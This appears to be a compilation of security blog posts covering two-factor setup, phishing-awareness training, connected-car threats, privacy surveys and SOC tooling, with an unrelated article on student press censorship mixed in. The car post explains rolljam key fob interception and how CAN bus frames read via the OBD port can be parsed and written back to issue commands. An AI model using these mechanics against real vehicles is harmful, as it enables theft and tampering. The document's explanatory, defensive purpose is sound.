The two-factor authentication that Facebook has is called “Login Approvals.” You can find this in the blue menu bar at the top right side of your screen. Click the arrow that you see, which opens a menu. Choose the Settings option, and look for a gold colored badge. You then see “Security,” which you should click. To the right of that, you should see Login Approvals and near that, a box that says “Require a security code.” Put a check mark there and then follow the instructions. The Facebook Code Generator might require a person to use the mobile application on their phone to get their code. Alternatively, Facebook sends a text.


Google also has two-factor authentication. To do this, go to, and then look for the blue “Get Started” button. You can find it on the upper right of the screen. Click this, and then follow the directions. You can also opt for a text or a phone call to get a code. This also sets you up for other Google services, including YouTube.


Twitter also has a form of two-factor authentication. It is called “Login Verification.” To use it, log in to Twitter and click on the gear icon at the top right of the screen. You should see “Security and Privacy.” Click that, and then look for “Login Verification” under the Security heading. You can then choose how to get your code and then follow the prompts.


PayPal has a feature known as “Security Key.” To use this, look for the Security and Protection section on the upper right corner of the screen. You should see PayPal Security Key on the bottom left. Click the option to “Go to register your mobile phone.” On the following page, you can add your phone number. Then, you get a text from PayPal with your code.


Yahoo uses “Two-step Verification.” To use it, hover over your Yahoo avatar, which brings up a menu. Click on Account Settings and then on Account Info. Then, scroll until you see Sign-In and Security. There, you will see a link labeled “Set up your second sign-in verification.” Click that and enter your phone number. You should get a code via text.


The system that Microsoft has is called “Two-step Verification.” To use it, go to the website Look for the link on the left. It goes to Security Info. Click that link. On the right side, click Set Up Two-Step Verification, and then follow the prompts.


Apple also has something called “Two-Step Verification.” To use it, go to On the right is a blue box labeled Manage Your Apple ID. Hit that, and then use your Apple ID to log in. You should then see a link for Passwords and Security. You have to answer two questions to access the Security Settings area of the site. There, you should see another link labeled “Get Started.” Click that, and then enter your phone number. Wait for your code on your mobile phone, and then enter it.


LinkedIn also has “Two-Step Verification.” On the LinkedIn site, hover your mouse over your avatar and a drop-down menu should appear. Click on Privacy and Settings, and then click on Account. You should then see Security Settings, which you should also click. Finally, you should see the option to turn on Two-Step Verification for Sign-In. Turn that on to get your code.

These are only a few of the major sites that have two-step verification. Many others do, too, so always check to see if your accounts have this option. If they don’t, see if there is another option that you can use in addition to your password to log in. This could be an email or a telephone call, for instance. This will help to keep you safe.


Amazon’s Two-Step Verification adds an additional layer of security to your account. Instead of simply entering your password, Two-Step Verification requires you to enter a unique security code in addition to your password during sign in.

Without setting up two-step authentication for your most critical accounts, all a criminal needs is your username, which is often your email address, plus access to the data breach files containing billions of passwords that are posted all over the web. Once they search your username/email for the associated password, they are in.

Two factor locks them out.

Robert Siciliano personal security and identity theft expert and speaker is the author of 99 Things You Wish You Knew Before Your Identity Was Stolen. See him knock’em dead in this identity theft prevention video.

Is Your Small Business Staff Trained in Security Awareness?

The Ponemon Institute released a shocking statistic: about 80% of all corporate data leaks are due to human error. In other words, it only takes a single staff member to cause a huge issue. Here’s a scenario: Let’s say that you have an employee, Betty. Betty is lovely. We love Betty. But when Betty is checking her personal email during her lunch break and sees an offer that promises a 10-pound weight loss in only a week, she wants to learn more, so she clicks the link in the email. What she doesn’t realize is that by clicking that link, she just installed a virus onto the computer. In addition, the virus now has access to your company’s network.

This was a very simple act, one that most of us do every day. However, this is why it is so important that your staff is up to date on security awareness. How can you do this? Here are some tips:

  • Present your staff with information about security awareness, and then set up a test where you send them a link they will want to click on. This is a process known as “phishing simulation.” If your staff members click on the links, and they probably will, it will take them to a safe page. However, on the page is a message telling them that they fell for a scam, and though they are safe this time, there could be great repercussions.
  • The staff members who click the link should be tested again. This way, you will know if the message got through.
  • Make sure when you give these tests that it isn’t predictable. Send the emails at different times of day and make sure they look different and have a different message. For instance, don’t send the “lose 10 pounds” email twice.
  • Think about hiring someone, a stranger, who will try to get your staff to give them sensitive information about your company over the phone, through email, or even in person. This is a valuable test, as it helps you to determine who the “weak links” are in your company.
  • Give your staff quizzes throughout the year to see who is paying attention to security.
  • You should focus on education, not discipline, when you are doing this. Don’t make them feel bad or punish them. Instead, make sure they know what they did wrong and work on not doing it again.
  • Ensure that your team knows that a data breach can also result in financial, legal, and criminal problems.
  • Schedule checks of workstations to see if any employee is doing something that might compromise your company’s sensitive data. This includes leaving information on a screen and walking away.
  • Explain the importance of security to your staff, and encourage them to report any activity that seems suspicious.
  • After training and testing your staff, make a list of all concepts that you want them to understand. Look at this list often, and evaluate it regularly to see if anything needs to be changed.
  • Don’t forget company officers. When company officers are omitted from this kind of training, it reflects poorly on the organization. Some security personnel are afraid to put their executives on the spot. That is a huge mistake. Security starts from the top.

Remember, there is nothing wrong with sharing tips with your staff. Post them around the office and keep reminding them to stay vigilant. This helps the information remain fresh in their minds, and helps you recognize those who are taking security seriously.

Robert Siciliano personal security and identity theft expert and speaker is the author of 99 Things You Wish You Knew Before Your Identity Was Stolen. See him knock’em dead in this identity theft prevention video.

Today’s Connected Cars Vulnerable to Hacking, Malware

The McAfee Advanced Threat Research team recently published an article about threats to automobiles on the French site Connected cars are growing rapidly in number and represent the next big step in personal transportation. Auto sales are expected to triple between 2017 and 2022, to US$155.9 billion from $52.5 billion, according to PwC France. Realizing this increase is a huge challenge for car companies as well as for IT security firms.

Through multiple added functions, from Wi-Fi and external connections to driving assistance and autonomous operations, connected cars will very soon need strong security to avoid any intrusions that could endanger drivers, passengers, and others.

Security Risks

Modern cars are exposed to security risks just as are other connected devices. Let’s look at current and future threats in the automotive security field.

The following diagram shows the main risks: 


Personal Data and Tracking

Connected cars record a lot of information about their drivers. This information can come from an external device connected to the car, such as a phone, and can include contact details, SMS and call history, and even musical tastes. A car can also record shifting patterns and other driving habits that could be used to create a picture of a driver’s competence. This kind of oversight could aid insurance companies when offering coverage, for example.

With personal data now considered the new gold, all of this information represents a valuable target for cybercriminals as well as companies and governments.

  • Cybercriminals can use this stolen information for financial gain and identity theft
  • Companies can use this information for marketing or insurance contracts
  • Governments can use this information for spying on and tracking people

Faked Car Data

Digital information can be modified and faked. By altering data such as pollution tests or performance, companies can take advantage of the results to increase sales. Similarly, drivers could modify car statistics such as distance traveled to fool insurance companies or future buyers.

Car Theft and Key Fob Hacking

Key fob hacking is a technique to allow an intruder to enter a car without breaking in. This technique is widely known by attackers and can be done easily with cheap hardware. The attack consists of intercepting the signal from a wireless key to either block the signal to lock the car or replay the signal to gain access.

One variant of the attack uses a jammer to block the signal. The jammer interferes with the electromagnetic waves used to communicate with the vehicle, blocking the signal and preventing the car from locking, leaving access free to the attacker. Some jammers have a range of more than 500 meters.

Key fob jammer.

Another attack intercepts the signal sent by the key and replays it to open the door. Auto manufacturers protect against this kind of attack by implementing security algorithms that prevent simple replays of the same signal: each signal sent from the key to the car is unique. However, one proof of concept for this attack blocks the signal to the car and stores it. The driver’s first click on the key does not work but is recorded by the attacker. The driver’s second click is also recorded, locking the car but giving two signals to the attacker. The first recorded signal, which the car has never received, is used to unlock the door. The second signal is stored for the attacker to use later.
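This two-click interception is often called a “rolljam” attack. A toy model of a rolling-code receiver shows why a banked, never-received code still works while a replayed old one does not (the monotonic counter scheme here is a great simplification of real key fob cryptography):

```python
class RollingCodeReceiver:
    """Toy model of a rolling-code car receiver: it accepts only codes
    newer than the last one it has seen, which defeats replay of a code
    the car has already consumed. The rolljam trick works because the
    jammed codes were never received, so they still count as "new" when
    the attacker replays them later."""

    def __init__(self):
        self.last_counter = -1      # highest code counter seen so far

    def try_unlock(self, code: int) -> bool:
        if code > self.last_counter:
            self.last_counter = code    # consume the code
            return True
        return False                    # stale or replayed code: rejected
```

In the scenario above, the attacker jams and records codes 100 and 101; replaying 100 unlocks the car (the receiver never saw it), and 101 stays banked for later, while re-sending 100 a second time fails.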

Entering by the (CAN) Back Door

Autos use several components to interact with their parts. Since the end of the 20th century, cars have used the dedicated controller area network (CAN) standard to allow microcontrollers and devices to talk to each other. The CAN bus communicates with a vehicle’s electronic control unit (ECU), which operates many subsystems such as antilock brakes, airbags, transmission, audio system, doors, and many other parts—including the engine. Modern cars also have an On-Board Diagnostic Version 2 (OBD-II) port. Mechanics use this port to diagnose problems. CAN traffic can be intercepted from the OBD port.

The on-board diagnostic port.

An external OBD device could be plugged into a car as a backdoor for external commands, controlling services such as the Wi-Fi connection, performance statistics, and unlocking doors. The OBD port offers a path for malicious activities if not secured.
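For the curious: on Linux, CAN traffic read through an OBD-II interface via SocketCAN arrives as fixed 16-byte frames (a 32-bit identifier, a 1-byte data length, 3 padding bytes, then up to 8 data bytes). A sketch of unpacking one; the frame in the test is an illustrative OBD-style response, not captured from a real vehicle:

```python
import struct

def parse_can_frame(raw: bytes):
    """Unpack one 16-byte Linux SocketCAN frame into (arbitration_id, data).

    Layout per <linux/can.h>: u32 can_id (native order), u8 dlc,
    3 padding bytes, then 8 data bytes of which only `dlc` are valid."""
    if len(raw) != 16:
        raise ValueError("SocketCAN frames are exactly 16 bytes")
    can_id, dlc = struct.unpack_from("<IB", raw)
    data = raw[8:8 + dlc]                  # data payload starts at offset 8
    return can_id & 0x1FFFFFFF, data       # mask off the EFF/RTR/ERR flag bits
```

Anything that can write these frames back to the bus can issue the same commands the ECUs exchange among themselves, which is exactly why an unsecured OBD port is such an attractive back door.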

Spam and Advertising

Adding more services to connected cars can also add more security risks. With the arrival of fully connected autos such as Teslas, which allow Internet access from a browser, it is feasible to deliver a new type of spam based on travel and geolocation. Imagine a pop-up discount as you approach a fast-food restaurant. Not only is this type of action likely to be unwanted, it could also provide a distraction to drivers. We already know spam and advertising are infection vectors for malware.

Malware and Exploits

All the ECUs in an auto contain firmware that can be hacked. Cars employ in-vehicle infotainment (IVI) systems to control audio or video among other functions. These systems are increasing in complexity.

An in-vehicle infotainment system.

MirrorLink, Bluetooth, and internal Wi-Fi are other technologies that improve the driving experience. By connecting our smartphones to our cars, we add functions such as phone calls, SMS, and music and audiobooks, for example.

Malware can target these devices. Phones, browsers, or the telecommunication networks embedded in our cars are infection vectors that can allow the installation of malware. In 2016, McAfee security researchers demonstrated a ransomware proof of concept that blocked the use of the car until the ransom was paid.

A proof-of-concept IVI ransomware attack on a vehicle.

The ransomware was installed via an over-the-air system that allowed the connection of external equipment.

Third-Party Apps  

Many modern cars allow third parties to create applications to extend their connected services. For example, it is possible to unlock or lock the door from your smartphone using an app. Although these apps can be very convenient, they effectively open these services to anyone and can become a new attack vector. It is easier to hack a smartphone app than a car’s ECU because the former is more affordable and offers many more resources. Car apps are also vulnerable because some third parties employ weak security practices and credentials are sometimes stored in clear text. These apps may also store personal information such as GPS data, car model, and other details. This scenario has already been demonstrated with the OnStar app, which a hacker exploited to remotely open a car.

Vehicle-to-Vehicle Communications

Vehicle-to-vehicle (V2V) technology allows communications between vehicles on the road, using a wireless network. This technology can aid safety on the road by reducing a car’s speed when another vehicle is too close, for example. It can also communicate with road sign devices (vehicle to infrastructure). That transmitted information improves both the driving experience and safety. Now imagine this channel invaded by destructive malware. If the V2V system becomes an infection vector, a malicious actor could create malware that spreads across many connected cars. This sounds like a sci-fi scenario, right? Yet it is not, when we compare this possibility with recent threats such as WannaCry or NotPetya, which targeted computers with destructive malware. It is not hard to predict such a nightmare scenario.


Connected cars are taking over the roads and will radically change how we move about. By enhancing the customer experience, the automotive and tech industries will provide exciting new services. Nonetheless, we need to consider the potential risks and implement security sooner rather than later. Some of the scenarios in this post are already occurring in the wild; others could happen sooner than we expect.


The post Today’s Connected Cars Vulnerable to Hacking, Malware appeared first on McAfee Blogs.

Indians Are Increasingly Realising Nothing Said Online Is Private

The world is becoming increasingly connected: locks for your home controlled from your smartphone; CCTV cameras in every room that let you keep tabs on your home when you are out; smartphones that help you work, run, and plan activities; smart TVs that connect to the internet; smart refrigerators that take stock of your groceries and place orders with the supermarket; games that can keep you glued to your screen for hours. The list is ever growing.

We all enjoy this connected lifestyle; it has made the world a global village and daily chores so much easier and faster. But there are some caveats. We tend to forget that in the virtual world, your safety and privacy depend largely on you and the precautions you take. Otherwise you end up sharing too much information about yourself and your family, making you a likely candidate for identity theft and phishing.

This is exactly what a new global McAfee survey titled New Security Priorities in An Increasingly Connected World demonstrates – we are putting more personal information into the digital realm in today’s connected world. The study also reveals a disparity in concerns as Indians do not view safeguarding their connected devices (25%) as equally important as safeguarding their identity (45%) and privacy (39%).

On a positive note, 39% of Indians rank security as the most important factor when purchasing a connected home device. That’s more than one-third of the total respondents. In addition (this one is my particular favorite), 71% of the parents would be interested in a monitoring tool to supervise their kids online.

Other India-centric salient findings of the study:

  • 79% of Indians indicate that their concern about online security has increased compared with five years ago, and 45% rank protection of identity as their top priority.
  • 39% rank security as the most important factor when purchasing a connected home device.

But though users are aware of the pitfalls of sharing too much information, they are not as proactive about their online security as they should be. The survey highlights the need for more hands-on involvement on the part of the consumer. Not only do they need to take advantage of security tools, they also need to act responsibly online.

If you could somehow collect all the data you have shared over the years, you might be surprised at how much you have let slip unknowingly, including facts like whether you prefer coffee to tea. A simple search or a like on a post can also reveal a lot about you, your tastes, and your character. Worried? The thing to do is to take steps to stay safe online.

Tips to stay safe online and protect what matters most:

  • Do the little things. Cybercriminals don’t have to be great at what they do to steal your personal information. Minor tactics like changing default passwords and using a unique password for each account can go a long way toward preventing your personal information from being stolen. A password manager can help you create strong passwords and eliminate the need to remember them.
  • Research before you buy. Look up products and their manufacturers before you buy internet-enabled devices. If you find that a manufacturer isn’t taking security seriously, it’s best to avoid its products.
  • Use identity theft protection. Consider an identity theft protection service that monitors the use of your personally identifying information, insures against financial losses, and provides recovery tools in the event of ID theft or fraud.
  • Keep devices up to date. Update device and application software as soon as the manufacturer makes it available. Many new versions of software or operating systems contain security updates designed specifically to protect the user.
  • Review your account info. Regular reviews of online bank and credit account transactions can help you spot suspicious activities or purchases. If you see something suspicious, report it to your financial institution and law enforcement.
  • Re-check your privacy settings. It’s always important to do a quick check on privacy settings and update them regularly so that your personal data stays safe and in the hands of only the few people you trust.
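To make the first tip concrete, here is a minimal sketch of generating a strong, unique password with Python’s standard `secrets` module. The length and character set here are illustrative choices, not a recommendation from the survey:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Build a random password from letters, digits, and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    # secrets draws from a cryptographically secure random source,
    # unlike the general-purpose random module
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())
```

A password manager does this generation and storage for you; the point is that unique, high-entropy passwords are cheap to produce, so there is no reason to reuse one.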

In an ever-changing digital world that is continually fuelled by speed, developments and complexities, your security is your responsibility too. Own your digital presence and make your digital realm a secure one.

Happy surfing!

The post Indians Are Increasingly Realising Nothing Said Online Is Private appeared first on McAfee Blogs.

Inside the fight to prevent censorship of Indiana student journalists


Plainfield High School student journalist Anu Nattam (center) holding the special edition of her school magazine the day of testifying in favor of Bill 1016

Olivia McLellan: FOX59/CBS4

After a group of student journalists in Indiana published an issue of their high school magazine last October that focused on dating and relationships, the school implemented a policy of content review prior to publication. This, some students say, amounts to censorship that is compromising their journalistic education.  

The October issue of Plainfield High School’s publication, the Quaker Shaker, was the magazine’s first “special topic” edition, called the Shakedown. It explored the ins and outs of relationships in high school, including polls about the prevalence of sexting as well as more serious topics like dating violence. It even won an award, marking the first time the publication had won a national-level prize.

But parents and school administrators took issue with the content, particularly the sexting poll and the use of Urban Dictionary definitions of terms like “polyamory” and “friends with benefits.” In particular, a family member of the school board president blasted the publication on social media, encouraging people to complain to the school and the school board president, and even asked why local churches were not rising up.

Now, student journalists at Plainfield need administrative approval to publish. As a result of this pushback, Plainfield High School journalism adviser Michelle Burress said, an advisory committee has been set up to evaluate every publication before it goes to press, and the principal must approve anything before it runs.

To Anu Nattam, a co-editor of the publication, this policy shows that her school wants her magazine staff to act as a public relations team rather than journalists. Since the policy was implemented, she said that they were forced to change the name of their special edition issues to the Shakeout. Nattam said the school argued that the name Shakedown had mafia connotations.

“We’ve also had to change quotes, and delete quotes for trivial things that make no sense,” Nattam said. She also noted that they were asked to change the cover photo of one magazine issue merely because it showed a picture of a clothed posterior.

But it is her responsibility as a student journalist, Nattam said, to report on issues that are relevant to the student body, even if they might be controversial.

“Filtering reports and restricting ideas is not only an injustice to student journalists, but to the people reading the stories we write. Ideas and facts that impact a student body are not always going to make a school look good. Just like in real life, not everything is sunshine and rainbows.”

Nattam’s adviser Michelle Burress said that now, students are self-censoring, and worry about everything they write coming under intense scrutiny. “They are shying away from topics that normally they would not hesitate to cover because they do not want to get shot down,” she said. “More than ever this year, students are saying that they do not want to be quoted or pictured in the news magazine or yearbook.”

Ed Clere, a member of the Indiana House of Representatives, thinks this is a huge problem. “Most people would have been proud to have student journalists who could produce work of that caliber,” he said of the Shakedown’s dating and relationships issue. Nothing the Plainfield High School student journalists have done or published, he said, has justified the censorship and “over the top” reaction that has ensued.

For two sessions of the Indiana General Assembly, Clere has introduced legislation that would protect the free speech rights of student journalists across the state, prohibiting schools from encroaching on students’ speech rights except in very specific situations.

The bill reads: “This chapter may not be construed to authorize or protect content of school sponsored media by a student journalist that: (1) is libelous or slanderous; (2) violates federal or state law; (3) incites students to: (A) create a clear and present danger of the commission of an unlawful act; (B) violate a public school or school corporation policy; or (C) be disruptive of the operation of the public school; or (4) encourages, promotes, or supports behavior contrary to citizenship or moral instruction required under IC 20-30-5.”

House Bill 1016 was supported by many student journalists, including Anu Nattam, who testified in its favor, as well as by teachers and administrators. But organizations including the Indiana School Boards Association and the Indiana Association of Public School Superintendents fiercely opposed the bill. It died narrowly in the House on February 5, 2018.

Since a similar bill had failed the year before, Clere knew he was facing an uphill battle, but he was still surprised at the level of resistance and opposition the legislation encountered.

Clere cited a 1988 Supreme Court case that limited student publication freedom, Hazelwood School District v. Kuhlmeier, as a “big step backward” for the First Amendment rights of young journalists. “[School board superintendents and principals] like the absolute control they enjoy under Hazelwood. They don’t want to give it up.”

Indiana is far from the only state in which legislators, students, and teachers are fighting together to grant speech protections to student journalists. Clere said that efforts in Indiana are part of New Voices, a Student Press Law Center initiative that networks state campaigns to pass such legislation.

Some states, including California, Montana, and Illinois, have successfully enacted New Voices legislation like Clere’s Bill 1016. But most states have not.

In Indiana, Clere isn’t giving up. Assuming he is re-elected, he vowed that he would “keep trying, and keep bringing this legislation back as long as I am able.” While he is open to discussion and addressing some of the concerns of school administrators, he said he is not open to watering down the bill to the point where it is meaningless.

“This is about more than journalism education and student publications,” Clere said. “Censorship of student journalists hurts entire school communities. It deprives them of the important and relevant stories and conversations that benefit all students.”

Nattam agrees. “People need to realize that by limiting press freedom for students, they are limiting their education. That’s what I feel like was done to me and my staff—our education was compromised, because we can’t be put in the same environment as a professional journalist. So, we can’t prepare for a career in journalism if that's what we choose to do.”

“If anything, this whole thing has fueled my passion for journalism,” Nattam said. “The press is how the public stays informed.”

DevSecOps Beyond the Myths: Cutting Through the Hype and Getting to Results

There’s been a lot of talk and buzz about DevOps and DevSecOps, precipitated by the mega technology trends and cybersecurity events shaping our industry. So my colleagues and I were excited to be part of a recent Virtual Summit on “Assembling the Pieces of the DevSecOps Puzzle,” which aimed to move the conversation from defining DevSecOps to enacting it. We are spending a lot of time helping our customers make this shift, so we were thrilled to share our experiences and best practices with you. The Virtual Summit contained a series of sessions on topics such as tweaking your application security policies in a DevOps world, the changing role of the security professional, and how to get your developers the security training they need. I encourage you to look at the lineup and take advantage of some of these practical and valuable sessions.

I was lucky enough to kick off the Virtual Summit with a keynote address and answer some of the audience’s early questions. In my keynote, I talked about how DevOps is becoming a necessity in today’s application economy. In a world run by software, it’s critical to develop and release new features continuously, which is where DevOps comes in. DevOps empowers development teams with an iterative process, allowing for continuous deployment of software and introduction of new features at a rapid pace. But many have raised concerns about how security fits into this fast-paced, iterative landscape. Doesn’t continuous deployment just mean continuous opportunities to introduce vulnerabilities? That doesn’t have to be the case if we move to a DevSecOps model, where security is integrated into the DevOps process and which actually gives us the opportunity to create better security.

Ultimately, this is a big change that affects the culture, processes, technologies, and priorities of many teams in an organization, and no change of this magnitude comes without some stumbling blocks. But we’ve seen it work, and seen how “secure” can become part of “quality” software.

I talk about some of these stumbling blocks in my keynote, debunk some of the popular myths surrounding DevSecOps and provide practical recommendations on how to get this done in your organization. I also talk about the enablers for success you’ll need to have in place to avoid making these myths a reality. These enablers include the security team’s openness to this new model, developer security training, and the right security tools. Finally, you’ll hear me answer some excellent viewer questions in my keynote, including:

Will security champions on the development team replace the security team?

Are certain industries more resistant to DevOps?

If security is shifting left, and development is doing the security testing – what does that look like?

You can get my thoughts on these questions in the full recording of my keynote. And if you’re moving toward DevSecOps, or just in the planning stages, please check out some of my colleagues’ excellent sessions from this summit that are packed with tips and advice on making DevSecOps a reality.

Is Your SOC Caught in the Slow Lane?

Everybody’s got a device. And the data on that device is moving into the public cloud. Massive amounts of data. In a world of massive amounts of data, who’s the traffic cop? The Security Operations Center (SOC).

But these days the daily flow of data traffic resembles a Formula One race car going full out, while some traffic monitors amount to a single cop on the beat.

Research shows this analogy is not far off: 25% of security events go unanalyzed. And 39% of cybersecurity organizations manually collect, process, and analyze external intelligence feeds.

Think about this. At the dawn of the Digital Century, more than a third of all companies are approaching cybersecurity manually.

This is not sustainable.

In short, there are simply not enough people to keep up with the security challenges. But it’s not a question of training or hiring more people. The idea is for humans to do less and machines to do more. Automating threat defense has many advantages: speed, the ability to learn, and the ability to collaborate with other solutions. Integration of data, analytics, and machine learning are the foundations of the advanced SOC.

For about a year now, McAfee engineers have been developing a new architecture for an existing SIEM tool, McAfee® Enterprise Security Manager version 11 (“McAfee ESM 11”), which can serve as the foundation of a modern SOC.

As cybercriminals get smarter, the need for SOC operations to evolve becomes more important. McAfee ESM 11 can help customers transition their SOC from silos of isolated data and manual investigations to faster operations based on machine learning and behavioral analytics.

What makes ESM 11 different from other SIEM tools is its flexible architecture and scalability.

The open and scalable data bus architecture at the heart of McAfee ESM 11 shares huge volumes of raw, parsed and correlated events to allow threat hunters to easily search recent events, while reliably retaining and storing data for compliance and forensics.

The scalability of McAfee ESM 11 architecture allows for flexible horizontal expansion with high availability, giving organizations the ability to rapidly query billions of events. Additional McAfee ESM appliances or virtual machines can be added at any point to add ingestion, query performance, and redundancy.

ESM 11 also includes the ability to partner. An extensible and distributed design integrates with more than three dozen partners, hundreds of standardized data sources, and industry threat intelligence.

By deploying advanced analytics to quickly elevate key insights and context, analysts and members of a security team tasked with examining cyberthreats can focus their attention on high-value next tasks, like understanding a threat’s impact across the organization and what’s needed to respond.

This human-machine teaming, enabled by McAfee’s new and enhanced security operations solutions like McAfee Investigator, McAfee Behavioral Analytics, and McAfee Advanced Threat Defense, allows organizations to more efficiently collect, enrich and share data, turn security events into actionable insights and act to confidently detect and correct sophisticated threats faster. The strategy was outlined in my last SOC blog.

We’ve been testing these products together at the new McAfee Security Fusion Centers, located in Plano, Texas and Cork, Ireland. These facilities were built last year and are designed to support full visibility and global management of risks, in a simulated environment. The Security Fusion Centers give customers a blueprint for building out their own SOCs.

In short, we are revving up the SOC: critical facts in minutes, not hours; highly tuned appliances that collect, process, and correlate log events spanning multiple years alongside other data streams, including STIX-based threat intelligence feeds; and storage of billions of events and flows, with quick access to long-term event data for investigating attacks.

Let your security travel as fast as your data. And get your SOC out of the slow lane.

The post Is Your SOC Caught in the Slow Lane? appeared first on McAfee Blogs.

Separating the Signal from Noise

In security operations, we frequently talk about the difficulties in separating the signal from the noise to detect legitimate threats and disregard false alarms. Data overload is a common problem and triage becomes a critical skill to hone and develop.

As the chief information security officer (CISO) for McAfee, I am aware at multiple levels of the risks that come from a failure to focus on the right thing. If one of our security operations center (SOC) analysts fails to notice multiple login attempts by the same user from different countries in a short span of time, it could cost us both valuable company data and our reputation in the industry.
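As a rough illustration of the kind of triage rule involved, the scenario above (logins by one user from different countries within a short window) can be sketched in a few lines. The event format, country labels, and one-hour threshold are all hypothetical, not how any particular SOC tool represents data:

```python
from datetime import datetime, timedelta

def flag_suspicious_logins(events, window=timedelta(hours=1)):
    """Flag users who log in from different countries within `window`."""
    flagged = set()
    # Sort by user, then time, so consecutive pairs compare one user's logins
    ordered = sorted(events, key=lambda e: (e[0], e[2]))
    for (u1, c1, t1), (u2, c2, t2) in zip(ordered, ordered[1:]):
        if u1 == u2 and c1 != c2 and (t2 - t1) <= window:
            flagged.add(u1)
    return flagged

# Hypothetical login events: (username, country, timestamp)
events = [
    ("alice", "US", datetime(2018, 3, 1, 9, 0)),
    ("alice", "RU", datetime(2018, 3, 1, 9, 20)),  # 20 minutes later, new country
    ("bob",   "US", datetime(2018, 3, 1, 9, 0)),
    ("bob",   "US", datetime(2018, 3, 1, 10, 0)),
]
print(flag_suspicious_logins(events))  # {'alice'}
```

A real SIEM correlates far richer context than this, but the sketch shows why automation matters: a rule never tires of scanning millions of event pairs, while a human analyst might miss the one pair that counts.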

For these reasons, McAfee announced major enhancements today to our security operations portfolio in our security information and event management (SIEM) and Security Analytics product lines – enhancements that the McAfee Information Security team I am proud to lead helped to road-test. We also announced that our state-of-the-art converged physical and cyber Security Fusion Centers are now fully operational in Plano, Texas, USA and Cork, Ireland – less than a year after we emerged from Intel as a standalone company.

The big deal for the McAfee Security Fusion Centers is that they have a dual mission: 1) to protect McAfee and 2) to help us build better products. And for myself, I would add a third objective: help our customers learn from our experiences protecting McAfee. We want to help them build better reference architectures, learn how to communicate with boards of directors, and become more innovative in solving cybersecurity problems.

For Job 1, protect the enterprise, we believe in the primacy of fundamentals. We use the National Institute of Standards and Technology (NIST) cybersecurity framework, as well as the Factor Analysis of Information Risk (FAIR) method to quantify our risk posture, and continually manage for the framework’s core functions of Identify, Protect, Detect, Respond, and Recover. It’s critical that we understand what is happening in our environment and that is why we chose to converge our physical and cybersecurity functions into one operations center – a Security Fusion Center. We need to collect data across all aspects of our operating environment. Without that ability, we are flying blind.

Next, we focus on being able to answer a series of vital questions that help us complete the identification functions. We ask:

  1. What is on the network and how are our networks accessible? We must be able to identify our assets. That visibility into what is connected to us is critical. We use tools like Rapid7 Nexpose, McAfee Rogue System Detection, and network access control (NAC) to constantly monitor the network to tell us what is connected to us.
  2. How are we managing access to vital systems and stores of data? We decided from the beginning that we could not take access to information assets for granted. At McAfee, there is no implicit right of access – only explicit privilege. In this age of bring-your-own-device (BYOD), we require two-factor authentication to access the McAfee network. If your role requires access to sensitive information, “need to know” access is applied, and employees must comply with other access control mechanisms like separation of duties, least privilege, and information management.
  3. Where are the vulnerabilities? We need to evaluate risk across our environment from device to cloud. This means more than just audits and vulnerability management. We had to design our systems so that they would be scalable and support our incident response functions like patch management and counter measures in a prioritized manner. We especially rely on McAfee ePO for visibility across on- and off-premises devices.
  4. How is the data protected? This is a matter of understanding where the crown jewels of our data reside and what the risks of exfiltration are. It’s vital to set up policies in a very prioritized and strategic manner. Data loss prevention requires thinking through the data, the applications, and the users.
  5. How are we doing against the basics? While it is great to have next generation toolsets, it is often the basics that most organizations miss that cause compromises. For example, we are constantly focused on basics like security architecture, access and authentication control, device configuration and baselines, operating system and third-party patch levels, security awareness training, and table-top exercises.  Even at McAfee with the entire product portfolio, we are diligent about instilling the basics across our security operations.
  6. Finally, what signals do we focus on? We need context and insight to answer this. This requires a place where all the data can be collected, enriched and shared. We have been using McAfee Enterprise Security Manager 11.0, which was announced today, for some time now. The open data bus architecture enables our SIEM to ingest a high volume of data, scaling to billions of events, and then enrich that raw data nearly immediately, turning noise into insights. We also appreciate that this architecture allows the SIEM to intelligently share data to any appropriate appliance, application, or data store. This is an evolved security operations infrastructure – it’s a mix of a SIEM platform with User Entity Behavior Analytics (UEBA) and threat investigation, using McAfee Behavioral Analytics (MBA) and McAfee Investigator. Our Security Fusion Centers are the first places where all those pieces will be present and working together.
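The “collect, enrich, share” idea in the last item can be pictured with a toy sketch. The lookup tables, field names, and addresses below are invented for illustration and do not reflect any product’s internals:

```python
# Illustrative only: attach context to a raw event so analysts see
# insight rather than noise.
ASSET_OWNERS = {"10.0.0.5": "finance-team"}   # hypothetical asset inventory
THREAT_INTEL = {"203.0.113.99"}               # hypothetical known-bad IPs

def enrich(event: dict) -> dict:
    """Return a copy of the event annotated with owner and threat context."""
    enriched = dict(event)
    enriched["owner"] = ASSET_OWNERS.get(event["dst_ip"], "unknown")
    enriched["known_bad_source"] = event["src_ip"] in THREAT_INTEL
    return enriched

raw = {"src_ip": "203.0.113.99", "dst_ip": "10.0.0.5", "action": "login"}
print(enrich(raw))  # owner: 'finance-team', known_bad_source: True
```

The enriched record answers at a glance what the raw one could not: whose asset was touched, and whether the source is already known to be hostile. That is the difference between a log line and a signal.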

As for Job #2, helping McAfee build better products, by now you can see how we are living out a commitment to be Customer Zero for McAfee. Going forward, we are going to be the first organization to use McAfee’s new products. But we are doing that in a way that will help our customers implement better, faster and more smoothly before they have even seen the product. We’re working out the bugs and we’re working on feature requests with our Product Management and Engineering teams.

This helps us to be better, more innovative, and to solve cybersecurity challenges. It is meant to be a very tight collaboration: a place to try out our products in the real world. We’re going to get there through collaboration. From our learnings in the first year, we have observed that diversity is the single most important factor in developing a world-class organization. Diversity of thought challenges typical thinking and results in better outcomes.

In fact, collaboration is personally my number one thing. I wanted to work with the smartest people in the world. I will acknowledge that I am not the smartest person in the room. Somebody is going to know more about security than I do. Embracing that and bringing that all together will make us all stronger and better at our jobs. And that is what we mean when we say, “Together is Power.”

As for my personal third goal, helping all of you to be better, too, that’s why I’m sharing here. We’ll continue this dialogue about how McAfee is protecting itself and, in the process, learning more about helping you with another blog post soon. I’ll be sharing the byline with my colleague, Jason Rolleston, Vice President for Security Intelligence & Analytics.

Let me know what signals you are focused on and how we can help solve problems together.

You can look for Grant Bourzikas on Twitter and LinkedIn and at security events like MPOWER, Black Hat, and RSA.

McAfee technologies’ features and benefits depend on system configuration and may require enabled hardware, software, or service activation. No computer system can be absolutely secure.


The post Separating the Signal from Noise appeared first on McAfee Blogs.

Critical Infrastructure Under Attack

